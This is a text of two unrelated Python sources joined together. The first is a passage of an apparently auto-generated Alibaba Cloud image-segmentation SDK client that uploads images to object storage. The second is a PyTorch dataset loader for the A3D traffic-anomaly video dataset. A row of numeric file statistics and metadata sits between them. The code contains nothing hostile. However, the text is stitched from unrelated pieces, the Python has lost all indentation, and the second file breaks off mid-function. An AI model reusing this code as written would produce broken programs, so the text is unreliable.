segment_skyreq.image_url = "http://" + str(auth_response.bucket) + "." + str(auth_response.endpoint) + "/" + str(auth_response.object_key) + ""
segment_sky_resp = self.segment_sky(segment_skyreq, runtime)
return segment_sky_resp
def get_async_job_result(self, request, runtime):
UtilClient.validate_model(request)
return imageseg_20191230_models.GetAsyncJobResultResponse().from_map(self.do_request("GetAsyncJobResult", "HTTPS", "POST", "2019-12-30", "AK", None, request.to_map(), runtime))
def segment_furniture(self, request, runtime):
UtilClient.validate_model(request)
return imageseg_20191230_models.SegmentFurnitureResponse().from_map(self.do_request("SegmentFurniture", "HTTPS", "POST", "2019-12-30", "AK", None, request.to_map(), runtime))
def segment_furniture_advance(self, request, runtime):
# Step 0: init client
access_key_id = self._credential.get_access_key_id()
access_key_secret = self._credential.get_access_key_secret()
auth_config = _rpc_models.Config(
access_key_id=access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint="openplatform.aliyuncs.com",
protocol=self._protocol,
region_id=self._region_id
)
auth_client = OpenPlatformClient(auth_config)
auth_request = open_platform_models.AuthorizeFileUploadRequest(
product="imageseg",
region_id=self._region_id
)
auth_response = auth_client.authorize_file_upload_with_options(auth_request, runtime)
# Step 1: request OSS api to upload file
oss_config = _oss_models.Config(
access_key_id=auth_response.access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint=RPCUtilClient.get_endpoint(auth_response.endpoint, auth_response.use_accelerate, self._endpoint_type),
protocol=self._protocol,
region_id=self._region_id
)
oss_client = OSSClient(oss_config)
file_obj = file_form_models.FileField(
filename=auth_response.object_key,
content=request.image_urlobject,
content_type=""
)
oss_header = _oss_models.PostObjectRequestHeader(
access_key_id=auth_response.access_key_id,
policy=auth_response.encoded_policy,
signature=auth_response.signature,
key=auth_response.object_key,
file=file_obj,
success_action_status="201"
)
upload_request = _oss_models.PostObjectRequest(
bucket_name=auth_response.bucket,
header=oss_header
)
oss_runtime = ossutil_models.RuntimeOptions(
)
RPCUtilClient.convert(runtime, oss_runtime)
oss_client.post_object(upload_request, oss_runtime)
# Step 2: request final api
segment_furniturereq = imageseg_20191230_models.SegmentFurnitureRequest(
)
RPCUtilClient.convert(request, segment_furniturereq)
segment_furniturereq.image_url = "http://" + str(auth_response.bucket) + "." + str(auth_response.endpoint) + "/" + str(auth_response.object_key) + ""
segment_furniture_resp = self.segment_furniture(segment_furniturereq, runtime)
return segment_furniture_resp
def refine_mask(self, request, runtime):
UtilClient.validate_model(request)
return imageseg_20191230_models.RefineMaskResponse().from_map(self.do_request("RefineMask", "HTTPS", "POST", "2019-12-30", "AK", None, request.to_map(), runtime))
def refine_mask_advance(self, request, runtime):
# Step 0: init client
access_key_id = self._credential.get_access_key_id()
access_key_secret = self._credential.get_access_key_secret()
auth_config = _rpc_models.Config(
access_key_id=access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint="openplatform.aliyuncs.com",
protocol=self._protocol,
region_id=self._region_id
)
auth_client = OpenPlatformClient(auth_config)
auth_request = open_platform_models.AuthorizeFileUploadRequest(
product="imageseg",
region_id=self._region_id
)
auth_response = auth_client.authorize_file_upload_with_options(auth_request, runtime)
# Step 1: request OSS api to upload file
oss_config = _oss_models.Config(
access_key_id=auth_response.access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint=RPCUtilClient.get_endpoint(auth_response.endpoint, auth_response.use_accelerate, self._endpoint_type),
protocol=self._protocol,
region_id=self._region_id
)
oss_client = OSSClient(oss_config)
file_obj = file_form_models.FileField(
filename=auth_response.object_key,
content=request.image_urlobject,
content_type=""
)
oss_header = _oss_models.PostObjectRequestHeader(
access_key_id=auth_response.access_key_id,
policy=auth_response.encoded_policy,
signature=auth_response.signature,
key=auth_response.object_key,
file=file_obj,
success_action_status="201"
)
upload_request = _oss_models.PostObjectRequest(
bucket_name=auth_response.bucket,
header=oss_header
)
oss_runtime = ossutil_models.RuntimeOptions(
)
RPCUtilClient.convert(runtime, oss_runtime)
oss_client.post_object(upload_request, oss_runtime)
# Step 2: request final api
refine_maskreq = imageseg_20191230_models.RefineMaskRequest(
)
RPCUtilClient.convert(request, refine_maskreq)
refine_maskreq.image_url = "http://" + str(auth_response.bucket) + "." + str(auth_response.endpoint) + "/" + str(auth_response.object_key) + ""
refine_mask_resp = self.refine_mask(refine_maskreq, runtime)
return refine_mask_resp
def parse_face(self, request, runtime):
UtilClient.validate_model(request)
return imageseg_20191230_models.ParseFaceResponse().from_map(self.do_request("ParseFace", "HTTPS", "POST", "2019-12-30", "AK", None, request.to_map(), runtime))
def parse_face_advance(self, request, runtime):
# Step 0: init client
access_key_id = self._credential.get_access_key_id()
access_key_secret = self._credential.get_access_key_secret()
auth_config = _rpc_models.Config(
access_key_id=access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint="openplatform.aliyuncs.com",
protocol=self._protocol,
region_id=self._region_id
)
auth_client = OpenPlatformClient(auth_config)
auth_request = open_platform_models.AuthorizeFileUploadRequest(
product="imageseg",
region_id=self._region_id
)
auth_response = auth_client.authorize_file_upload_with_options(auth_request, runtime)
# Step 1: request OSS api to upload file
oss_config = _oss_models.Config(
access_key_id=auth_response.access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint=RPCUtilClient.get_endpoint(auth_response.endpoint, auth_response.use_accelerate, self._endpoint_type),
protocol=self._protocol,
region_id=self._region_id
)
oss_client = OSSClient(oss_config)
file_obj = file_form_models.FileField(
filename=auth_response.object_key,
content=request.image_urlobject,
content_type=""
)
oss_header = _oss_models.PostObjectRequestHeader(
access_key_id=auth_response.access_key_id,
policy=auth_response.encoded_policy,
signature=auth_response.signature,
key=auth_response.object_key,
file=file_obj,
success_action_status="201"
)
upload_request = _oss_models.PostObjectRequest(
bucket_name=auth_response.bucket,
header=oss_header
)
oss_runtime = ossutil_models.RuntimeOptions(
)
RPCUtilClient.convert(runtime, oss_runtime)
oss_client.post_object(upload_request, oss_runtime)
# Step 2: request final api
parse_facereq = imageseg_20191230_models.ParseFaceRequest(
)
RPCUtilClient.convert(request, parse_facereq)
parse_facereq.image_url = "http://" + str(auth_response.bucket) + "." + str(auth_response.endpoint) + "/" + str(auth_response.object_key) + ""
parse_face_resp = self.parse_face(parse_facereq, runtime)
return parse_face_resp
def segment_vehicle(self, request, runtime):
UtilClient.validate_model(request)
return imageseg_20191230_models.SegmentVehicleResponse().from_map(self.do_request("SegmentVehicle", "HTTPS", "POST", "2019-12-30", "AK", None, request.to_map(), runtime))
def segment_vehicle_advance(self, request, runtime):
# Step 0: init client
access_key_id = self._credential.get_access_key_id()
access_key_secret = self._credential.get_access_key_secret()
auth_config = _rpc_models.Config(
access_key_id=access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint="openplatform.aliyuncs.com",
protocol=self._protocol,
region_id=self._region_id
)
auth_client = OpenPlatformClient(auth_config)
auth_request = open_platform_models.AuthorizeFileUploadRequest(
product="imageseg",
region_id=self._region_id
)
auth_response = auth_client.authorize_file_upload_with_options(auth_request, runtime)
# Step 1: request OSS api to upload file
oss_config = _oss_models.Config(
access_key_id=auth_response.access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint=RPCUtilClient.get_endpoint(auth_response.endpoint, auth_response.use_accelerate, self._endpoint_type),
protocol=self._protocol,
region_id=self._region_id
)
oss_client = OSSClient(oss_config)
file_obj = file_form_models.FileField(
filename=auth_response.object_key,
content=request.image_urlobject,
content_type=""
)
oss_header = _oss_models.PostObjectRequestHeader(
access_key_id=auth_response.access_key_id,
policy=auth_response.encoded_policy,
signature=auth_response.signature,
key=auth_response.object_key,
file=file_obj,
success_action_status="201"
)
upload_request = _oss_models.PostObjectRequest(
bucket_name=auth_response.bucket,
header=oss_header
)
oss_runtime = ossutil_models.RuntimeOptions(
)
RPCUtilClient.convert(runtime, oss_runtime)
oss_client.post_object(upload_request, oss_runtime)
# Step 2: request final api
segment_vehiclereq = imageseg_20191230_models.SegmentVehicleRequest(
)
RPCUtilClient.convert(request, segment_vehiclereq)
segment_vehiclereq.image_url = "http://" + str(auth_response.bucket) + "." + str(auth_response.endpoint) + "/" + str(auth_response.object_key) + ""
segment_vehicle_resp = self.segment_vehicle(segment_vehiclereq, runtime)
return segment_vehicle_resp
def segment_hair(self, request, runtime):
UtilClient.validate_model(request)
return imageseg_20191230_models.SegmentHairResponse().from_map(self.do_request("SegmentHair", "HTTPS", "POST", "2019-12-30", "AK", None, request.to_map(), runtime))
def segment_hair_advance(self, request, runtime):
# Step 0: init client
access_key_id = self._credential.get_access_key_id()
access_key_secret = self._credential.get_access_key_secret()
auth_config = _rpc_models.Config(
access_key_id=access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint="openplatform.aliyuncs.com",
protocol=self._protocol,
region_id=self._region_id
)
auth_client = OpenPlatformClient(auth_config)
auth_request = open_platform_models.AuthorizeFileUploadRequest(
product="imageseg",
region_id=self._region_id
)
auth_response = auth_client.authorize_file_upload_with_options(auth_request, runtime)
# Step 1: request OSS api to upload file
oss_config = _oss_models.Config(
access_key_id=auth_response.access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint=RPCUtilClient.get_endpoint(auth_response.endpoint, auth_response.use_accelerate, self._endpoint_type),
protocol=self._protocol,
region_id=self._region_id
)
oss_client = OSSClient(oss_config)
file_obj = file_form_models.FileField(
filename=auth_response.object_key,
content=request.image_urlobject,
content_type=""
)
oss_header = _oss_models.PostObjectRequestHeader(
access_key_id=auth_response.access_key_id,
policy=auth_response.encoded_policy,
signature=auth_response.signature,
key=auth_response.object_key,
file=file_obj,
success_action_status="201"
)
upload_request = _oss_models.PostObjectRequest(
bucket_name=auth_response.bucket,
header=oss_header
)
oss_runtime = ossutil_models.RuntimeOptions(
)
RPCUtilClient.convert(runtime, oss_runtime)
oss_client.post_object(upload_request, oss_runtime)
# Step 2: request final api
segment_hairreq = imageseg_20191230_models.SegmentHairRequest(
)
RPCUtilClient.convert(request, segment_hairreq)
segment_hairreq.image_url = "http://" + str(auth_response.bucket) + "." + str(auth_response.endpoint) + "/" + str(auth_response.object_key) + ""
segment_hair_resp = self.segment_hair(segment_hairreq, runtime)
return segment_hair_resp
def segment_face(self, request, runtime):
UtilClient.validate_model(request)
return imageseg_20191230_models.SegmentFaceResponse().from_map(self.do_request("SegmentFace", "HTTPS", "POST", "2019-12-30", "AK", None, request.to_map(), runtime))
def segment_face_advance(self, request, runtime):
# Step 0: init client
access_key_id = self._credential.get_access_key_id()
access_key_secret = self._credential.get_access_key_secret()
auth_config = _rpc_models.Config(
access_key_id=access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint="openplatform.aliyuncs.com",
protocol=self._protocol,
region_id=self._region_id
)
auth_client = OpenPlatformClient(auth_config)
auth_request = open_platform_models.AuthorizeFileUploadRequest(
product="imageseg",
region_id=self._region_id
)
auth_response = auth_client.authorize_file_upload_with_options(auth_request, runtime)
# Step 1: request OSS api to upload file
oss_config = _oss_models.Config(
access_key_id=auth_response.access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint=RPCUtilClient.get_endpoint(auth_response.endpoint, auth_response.use_accelerate, self._endpoint_type),
protocol=self._protocol,
region_id=self._region_id
)
oss_client = OSSClient(oss_config)
file_obj = file_form_models.FileField(
filename=auth_response.object_key,
content=request.image_urlobject,
content_type=""
)
oss_header = _oss_models.PostObjectRequestHeader(
access_key_id=auth_response.access_key_id,
policy=auth_response.encoded_policy,
signature=auth_response.signature,
key=auth_response.object_key,
file=file_obj,
success_action_status="201"
)
upload_request = _oss_models.PostObjectRequest(
bucket_name=auth_response.bucket,
header=oss_header
)
oss_runtime = ossutil_models.RuntimeOptions(
)
RPCUtilClient.convert(runtime, oss_runtime)
oss_client.post_object(upload_request, oss_runtime)
# Step 2: request final api
segment_facereq = imageseg_20191230_models.SegmentFaceRequest(
)
RPCUtilClient.convert(request, segment_facereq)
segment_facereq.image_url = "http://" + str(auth_response.bucket) + "." + str(auth_response.endpoint) + "/" + str(auth_response.object_key) + ""
segment_face_resp = self.segment_face(segment_facereq, runtime)
return segment_face_resp
def segment_head(self, request, runtime):
UtilClient.validate_model(request)
return imageseg_20191230_models.SegmentHeadResponse().from_map(self.do_request("SegmentHead", "HTTPS", "POST", "2019-12-30", "AK", None, request.to_map(), runtime))
def segment_head_advance(self, request, runtime):
# Step 0: init client
access_key_id = self._credential.get_access_key_id()
access_key_secret = self._credential.get_access_key_secret()
auth_config = _rpc_models.Config(
access_key_id=access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint="openplatform.aliyuncs.com",
protocol=self._protocol,
region_id=self._region_id
)
auth_client = OpenPlatformClient(auth_config)
auth_request = open_platform_models.AuthorizeFileUploadRequest(
product="imageseg",
region_id=self._region_id
)
auth_response = auth_client.authorize_file_upload_with_options(auth_request, runtime)
# Step 1: request OSS api to upload file
oss_config = _oss_models.Config(
access_key_id=auth_response.access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint=RPCUtilClient.get_endpoint(auth_response.endpoint, auth_response.use_accelerate, self._endpoint_type),
protocol=self._protocol,
region_id=self._region_id
)
oss_client = OSSClient(oss_config)
file_obj = file_form_models.FileField(
filename=auth_response.object_key,
content=request.image_urlobject,
content_type=""
)
oss_header = _oss_models.PostObjectRequestHeader(
access_key_id=auth_response.access_key_id,
policy=auth_response.encoded_policy,
signature=auth_response.signature,
key=auth_response.object_key,
file=file_obj,
success_action_status="201"
)
upload_request = _oss_models.PostObjectRequest(
bucket_name=auth_response.bucket,
header=oss_header
)
oss_runtime = ossutil_models.RuntimeOptions(
)
RPCUtilClient.convert(runtime, oss_runtime)
oss_client.post_object(upload_request, oss_runtime)
# Step 2: request final api
segment_headreq = imageseg_20191230_models.SegmentHeadRequest(
)
RPCUtilClient.convert(request, segment_headreq)
segment_headreq.image_url = "http://" + str(auth_response.bucket) + "." + str(auth_response.endpoint) + "/" + str(auth_response.object_key) + ""
segment_head_resp = self.segment_head(segment_headreq, runtime)
return segment_head_resp
def segment_commodity(self, request, runtime):
UtilClient.validate_model(request)
return imageseg_20191230_models.SegmentCommodityResponse().from_map(self.do_request("SegmentCommodity", "HTTPS", "POST", "2019-12-30", "AK", None, request.to_map(), runtime))
def segment_commodity_advance(self, request, runtime):
# Step 0: init client
access_key_id = self._credential.get_access_key_id()
access_key_secret = self._credential.get_access_key_secret()
auth_config = _rpc_models.Config(
access_key_id=access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint="openplatform.aliyuncs.com",
protocol=self._protocol,
region_id=self._region_id
)
auth_client = OpenPlatformClient(auth_config)
auth_request = open_platform_models.AuthorizeFileUploadRequest(
product="imageseg",
region_id=self._region_id
)
auth_response = auth_client.authorize_file_upload_with_options(auth_request, runtime)
# Step 1: request OSS api to upload file
oss_config = _oss_models.Config(
access_key_id=auth_response.access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint=RPCUtilClient.get_endpoint(auth_response.endpoint, auth_response.use_accelerate, self._endpoint_type),
protocol=self._protocol,
region_id=self._region_id
)
oss_client = OSSClient(oss_config)
file_obj = file_form_models.FileField(
filename=auth_response.object_key,
content=request.image_urlobject,
content_type=""
)
oss_header = _oss_models.PostObjectRequestHeader(
access_key_id=auth_response.access_key_id,
policy=auth_response.encoded_policy,
signature=auth_response.signature,
key=auth_response.object_key,
file=file_obj,
success_action_status="201"
)
upload_request = _oss_models.PostObjectRequest(
bucket_name=auth_response.bucket,
header=oss_header
)
oss_runtime = ossutil_models.RuntimeOptions(
)
RPCUtilClient.convert(runtime, oss_runtime)
oss_client.post_object(upload_request, oss_runtime)
# Step 2: request final api
segment_commodityreq = imageseg_20191230_models.SegmentCommodityRequest(
)
RPCUtilClient.convert(request, segment_commodityreq)
segment_commodityreq.image_url = "http://" + str(auth_response.bucket) + "." + str(auth_response.endpoint) + "/" + str(auth_response.object_key) + ""
segment_commodity_resp = self.segment_commodity(segment_commodityreq, runtime)
return segment_commodity_resp
def segment_body(self, request, runtime):
UtilClient.validate_model(request)
return imageseg_20191230_models.SegmentBodyResponse().from_map(self.do_request("SegmentBody", "HTTPS", "POST", "2019-12-30", "AK", None, request.to_map(), runtime))
def segment_body_advance(self, request, runtime):
# Step 0: init client
access_key_id = self._credential.get_access_key_id()
access_key_secret = self._credential.get_access_key_secret()
auth_config = _rpc_models.Config(
access_key_id=access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint="openplatform.aliyuncs.com",
protocol=self._protocol,
region_id=self._region_id
)
auth_client = OpenPlatformClient(auth_config)
auth_request = open_platform_models.AuthorizeFileUploadRequest(
product="imageseg",
region_id=self._region_id
)
auth_response = auth_client.authorize_file_upload_with_options(auth_request, runtime)
# Step 1: request OSS api to upload file
oss_config = _oss_models.Config(
access_key_id=auth_response.access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint=RPCUtilClient.get_endpoint(auth_response.endpoint, auth_response.use_accelerate, self._endpoint_type),
protocol=self._protocol,
region_id=self._region_id
)
oss_client = OSSClient(oss_config)
file_obj = file_form_models.FileField(
filename=auth_response.object_key,
content=request.image_urlobject,
content_type=""
)
oss_header = _oss_models.PostObjectRequestHeader(
access_key_id=auth_response.access_key_id,
policy=auth_response.encoded_policy,
signature=auth_response.signature,
key=auth_response.object_key,
file=file_obj,
success_action_status="201"
)
upload_request = _oss_models.PostObjectRequest(
bucket_name=auth_response.bucket,
header=oss_header
)
oss_runtime = ossutil_models.RuntimeOptions(
)
RPCUtilClient.convert(runtime, oss_runtime)
oss_client.post_object(upload_request, oss_runtime)
# Step 2: request final api
segment_bodyreq = imageseg_20191230_models.SegmentBodyRequest(
)
RPCUtilClient.convert(request, segment_bodyreq)
segment_bodyreq.image_url = "http://" + str(auth_response.bucket) + "." + str(auth_response.endpoint) + "/" + str(auth_response.object_key) + ""
segment_body_resp = self.segment_body(segment_bodyreq, runtime)
return segment_body_resp
def segment_common_image(self, request, runtime):
UtilClient.validate_model(request)
return imageseg_20191230_models.SegmentCommonImageResponse().from_map(self.do_request("SegmentCommonImage", "HTTPS", "POST", "2019-12-30", "AK", None, request.to_map(), runtime))
def segment_common_image_advance(self, request, runtime):
# Step 0: init client
access_key_id = self._credential.get_access_key_id()
access_key_secret = self._credential.get_access_key_secret()
auth_config = _rpc_models.Config(
access_key_id=access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint="openplatform.aliyuncs.com",
protocol=self._protocol,
region_id=self._region_id
)
auth_client = OpenPlatformClient(auth_config)
auth_request = open_platform_models.AuthorizeFileUploadRequest(
product="imageseg",
region_id=self._region_id
)
auth_response = auth_client.authorize_file_upload_with_options(auth_request, runtime)
# Step 1: request OSS api to upload file
oss_config = _oss_models.Config(
access_key_id=auth_response.access_key_id,
access_key_secret=access_key_secret,
type="access_key",
endpoint=RPCUtilClient.get_endpoint(auth_response.endpoint, auth_response.use_accelerate, self._endpoint_type),
protocol=self._protocol,
region_id=self._region_id
)
oss_client = OSSClient(oss_config)
file_obj = file_form_models.FileField(
filename=auth_response.object_key,
content=request.image_urlobject,
content_type=""
)
oss_header = _oss_models.PostObjectRequestHeader(
access_key_id=auth_response.access_key_id,
policy=auth_response.encoded_policy,
signature=auth_response.signature,
key=auth_response.object_key,
file=file_obj,
success_action_status="201"
)
upload_request = _oss_models.PostObjectRequest(
bucket_name=auth_response.bucket,
header=oss_header
)
oss_runtime = ossutil_models.RuntimeOptions(
)
RPCUtilClient.convert(runtime, oss_runtime)
oss_client.post_object(upload_request, oss_runtime)
# Step 2: request final api
segment_common_imagereq = imageseg_20191230_models.SegmentCommonImageRequest(
)
RPCUtilClient.convert(request, segment_common_imagereq)
segment_common_imagereq.image_url = "http://" + str(auth_response.bucket) + "." + str(auth_response.endpoint) + "/" + str(auth_response.object_key) + ""
segment_common_image_resp = self.segment_common_image(segment_common_imagereq, runtime)
return segment_common_image_resp
def get_endpoint(self, product_id, region_id, endpoint_rule, network, suffix, endpoint_map, endpoint):
if not UtilClient.empty(endpoint):
return endpoint
if not UtilClient.is_unset(endpoint_map) and not UtilClient.empty(endpoint_map.get('regionId')):
return endpoint_map.get('regionId')
return EndpointUtilClient.get_endpoint_rules(product_id, region_id, endpoint_rule, network, suffix)
| 44.656286 | 186 | 0.675026 | 4,281 | 38,717 | 5.692362 | 0.04555 | 0.076819 | 0.046945 | 0.036276 | 0.831836 | 0.812877 | 0.812877 | 0.812877 | 0.80943 | 0.80943 | 0 | 0.01498 | 0.244802 | 38,717 | 866 | 187 | 44.707852 | 0.818462 | 0.029858 | 0 | 0.689153 | 1 | 0 | 0.036007 | 0.008662 | 0 | 0 | 0 | 0 | 0 | 1 | 0.03836 | false | 0 | 0.017196 | 0 | 0.096561 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d4268e9d2f4cd636736ff2e06fe6899b8db20532 | 17,650 | py | Python | datasets/A3D.py | MoonBlvd/pytorch-i3d | 3804ab2e1df018619cd12342dff7976bb302058e | [
"Apache-2.0"
] | null | null | null | datasets/A3D.py | MoonBlvd/pytorch-i3d | 3804ab2e1df018619cd12342dff7976bb302058e | [
"Apache-2.0"
] | null | null | null | datasets/A3D.py | MoonBlvd/pytorch-i3d | 3804ab2e1df018619cd12342dff7976bb302058e | [
"Apache-2.0"
] | null | null | null | import torch
import torch.utils.data as data_utl
from torch.utils.data.dataloader import default_collate
from PIL import Image
import numpy as np
import json
import csv
import h5py
import os
import os.path
import cv2
import pdb
def video_to_tensor(pic):
"""Convert a ``numpy.ndarray`` to tensor.
Converts a numpy.ndarray (T x H x W x C)
to a torch.FloatTensor of shape (C x T x H x W)
Args:
pic (numpy.ndarray): Video to be converted to tensor.
Returns:
Tensor: Converted video.
"""
return torch.from_numpy(pic.transpose([3,0,1,2]))
class A3D(data_utl.Dataset):
'''
A3D dataset for I3D
'''
def __init__(self,
split_file,
split,
root,
mode, transforms=None, horizontal_flip=None, save_dir='', seq_len=16, overlap=0):
self.split_file = split_file
self.transforms = transforms
self.mode = mode
self.root = root
self.save_dir = save_dir
self.seq_len = seq_len
self.overlap = overlap
self.fps = 10
self.num_classes = 10 # 9 known anomay type plus a normal, 0 is normal
self.name_to_id = {'normal': 0,
'start_stop_or_stationary': 1,
'moving_ahead_or_waiting': 2,
'lateral': 3,
'oncoming': 4,
'turning': 5,
'pedestrian': 6,
'obstacle': 7,
'leave_to_right': 8,
'leave_to_left': 9,
'unknown': 10}
self.id_to_name = {v:k for k, v in self.name_to_id.items()}
if split == 'train':
self.data = self.make_train_dataset(split_file, split, root, mode)
print("Number of used video:", len(self.data))
elif split in ['val', 'test']:
self.data = self.make_test_dataset(split_file, split, root, mode)
def make_train_dataset(self, split_file, split, root, mode):
dataset = []
with open(split_file, 'r') as f:
data = json.load(f)
self.valid_videos = []
sample_category_stats = {v:0 for v in self.name_to_id.values()}
for idx, vid in enumerate(data.keys()):
if data[vid]['video_start'] is None or \
data[vid]['video_start'] is None or \
data[vid]['anomaly_start'] is None or \
data[vid]['anomaly_end'] is None:
# NOTE: Sep 5, Some videos may have null video_start, meaning there is a bug and we skip the video for now
continue
if data[vid]['subset'] != split:
continue
if not os.path.exists(os.path.join(root, vid)):
continue
if int(data[vid]['anomaly_class']) == 10:
# skip unknown
continue
num_frames = data[vid]['num_frames']
if num_frames < self.seq_len:
continue
print("Training videos:", vid)
self.valid_videos.append(vid)
# NOTE: this is for the temporal label
# init label
labels = np.zeros([self.num_classes, num_frames], np.float32)
# normal label
labels[0, :data[vid]['anomaly_start']] = 1
# anomaly label
labels[int(data[vid]['anomaly_class']),
data[vid]['anomaly_start']:data[vid]['anomaly_end']] = 1 # binary classification
# normal label
labels[0, data[vid]['anomaly_end']:] = 1
assert int(data[vid]['anomaly_class']) > 0
for t in range(0, num_frames, (self.seq_len - self.overlap)):
if num_frames - t < self.seq_len:
seq_start = num_frames - self.seq_len
seq_end = num_frames
else:
seq_start = t
seq_end = t + self.seq_len
# label = labels[:, seq_start: seq_end]
# NOTE: for original I3D, one clip has only one label
label = np.zeros(self.num_classes, np.float32)
# NOTE: method 1, assign the label of the middle frame
# middle_idx = int(seq_end-seq_start/2)
# if middle_idx >= data[vid]['anomaly_start'] and middle_idx < data[vid]['anomaly_end']:
# label[int(data[vid]['anomaly_class'])] = 1 # abnormal
# sample_category_stats[int(data[vid]['anomaly_class'])] += 1
# else:
# label[0] = 1 # normal
# sample_category_stats[0] += 1
# NOTE: method 2, assign the accident label if over 1/3 of the frames are abnormal
if sum(labels[:, seq_start:seq_end].nonzero()[0] > 0) >= self.seq_len/3:
label[int(data[vid]['anomaly_class'])] = 1 # abnormal
sample_category_stats[int(data[vid]['anomaly_class'])] += 1
else:
label[0] = 1 # normal
sample_category_stats[0] += 1
dataset.append({"vid": vid,
"label": label,
"start": seq_start, # NOTE: 0-index
"end": seq_end,# NOTE: 0-index
# "image_dir":
})
# if mode == 'flow':
# num_frames = num_frames//2
# NOTE: for over fitting on 10 videos
if idx >=9:
break
print("Number of samples of all categories:")
[print('{}:{}'.format(self.id_to_name[k], v)) for k, v in sample_category_stats.items()]
return dataset
def make_test_dataset(self, split_file, split, root, mode):
dataset = []
with open(split_file, 'r') as f:
data = json.load(f)
self.valid_videos = []
for idx, vid in enumerate(data.keys()):
if data[vid]['video_start'] is None or \
data[vid]['video_start'] is None or \
data[vid]['anomaly_start'] is None or \
data[vid]['anomaly_end'] is None:
# NOTE: Sep 5, Some videos may have null video_start, meaning there is a bug and we skip the video for now
continue
# if data[vid]['subset'] != split:
# continue
if not os.path.exists(os.path.join(root, vid)):
continue
if int(data[vid]['anomaly_class']) == 10:
# skip unknown
continue
print("Validating videos:", vid)
num_frames = data[vid]['num_frames']
self.valid_videos.append(vid)
# # init label
# labels = np.zeros([self.num_classes, num_frames], np.float32)
# # normal label
# labels[0, :data[vid]['anomaly_start']] = 1
# # anomaly label
# labels[int(data[vid]['anomaly_class']),
# data[vid]['anomaly_start']:data[vid]['anomaly_end']] = 1
# # normal label
# labels[0, data[vid]['anomaly_end']:] = 1
# NOTE: for original I3D, one clip has only one label
label = np.zeros([self.num_classes], np.float32)
label[int(data[vid]['anomaly_class'])] = 1
dataset.append({"vid": vid,
"label": label,
"start": 0, # NOTE: 0-index
"end": num_frames# NOTE: 0-index
})
# if mode == 'flow':
# num_frames = num_frames//2
if idx >=9:
break
return dataset
def load_rgb_frames(self, image_dir, vid, start, end):
frames = []
for i in range(start, end):
# img = cv2.imread(os.path.join(image_dir, vid, 'images', str(i).zfill(6)+'.jpg'))[:, :, [2, 1, 0]]
img = Image.open(os.path.join(image_dir, vid, 'images', str(i).zfill(6)+'.jpg'))
w,h = img.size
# if w < 226 or h < 226:
# d = 226.-min(w,h)
# sc = 1+d/min(w,h)
# img = cv2.resize(img,dsize=(0,0),fx=sc,fy=sc)
# img = (img/255.)*2 - 1
frames.append(img)
return frames #torch.stack(frames, dim=1)
# def load_flow_frames(image_dir, vid, start, num):
# frames = []
# for i in range(start, start+num):
# imgx = cv2.imread(os.path.join(image_dir, vid, vid+'-'+str(i).zfill(6)+'x.jpg'), cv2.IMREAD_GRAYSCALE)
# imgy = cv2.imread(os.path.join(image_dir, vid, vid+'-'+str(i).zfill(6)+'y.jpg'), cv2.IMREAD_GRAYSCALE)
# w,h = imgx.shape
# if w < 224 or h < 224:
# d = 224.-min(w,h)
# sc = 1+d/min(w,h)
# imgx = cv2.resize(imgx,dsize=(0,0),fx=sc,fy=sc)
# imgy = cv2.resize(imgy,dsize=(0,0),fx=sc,fy=sc)
# imgx = (imgx/255.)*2 - 1
# imgy = (imgy/255.)*2 - 1
# img = np.asarray([imgx, imgy]).transpose([1,2,0])
# frames.append(img)
# return np.asarray(frames, dtype=np.float32)
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: (image, target) where target is class_index of the target class.
"""
data = self.data[index]
vid = data["vid"]
label = data["label"]
start = data["start"]
end = data["end"]
if os.path.exists(os.path.join(self.save_dir, vid+'.npy')):
return 0, 0, vid
if self.mode == 'rgb':
imgs = self.load_rgb_frames(self.root, vid, start, end)
else:
imgs = self.load_flow_frames(self.root, vid, start, end)
imgs, label = self.transforms(imgs, label)
return imgs, label, vid, start, end
def __len__(self):
return len(self.data)
class A3DBinary(data_utl.Dataset):
'''
A3D dataset for I3D binary classification
'''
def __init__(self,
split_file,
split,
root,
mode, transforms=None, horizontal_flip=None, save_dir='', seq_len=16, overlap=0):
self.split_file = split_file
self.transforms = transforms
self.mode = mode
self.root = root
self.save_dir = save_dir
self.seq_len = seq_len
self.overlap = overlap
self.fps = 10
self.num_classes = 2 # binary
if split == 'train':
self.data = self.make_train_dataset(split_file, split, root, mode)
print("Number of used video:", len(self.data))
elif split in ['val', 'test']:
self.data = self.make_test_dataset(split_file, split, root, mode)
def make_train_dataset(self, split_file, split, root, mode):
dataset = []
with open(split_file, 'r') as f:
data = json.load(f)
self.valid_videos = []
sample_category_stats = {'normal':0, 'abnormal': 0}
for idx, vid in enumerate(data.keys()):
if data[vid]['video_start'] is None or \
data[vid]['video_start'] is None or \
data[vid]['anomaly_start'] is None or \
data[vid]['anomaly_end'] is None:
# NOTE: Sep 5, Some videos may have null video_start, meaning there is a bug and we skip the video for now
continue
if data[vid]['subset'] != split:
continue
if not os.path.exists(os.path.join(root, vid)):
continue
num_frames = data[vid]['num_frames']
if num_frames < self.seq_len:
continue
print("Training videos:", vid)
self.valid_videos.append(vid)
# NOTE: this is for the temporal label
# init label
labels = np.zeros([2, num_frames], np.float32)
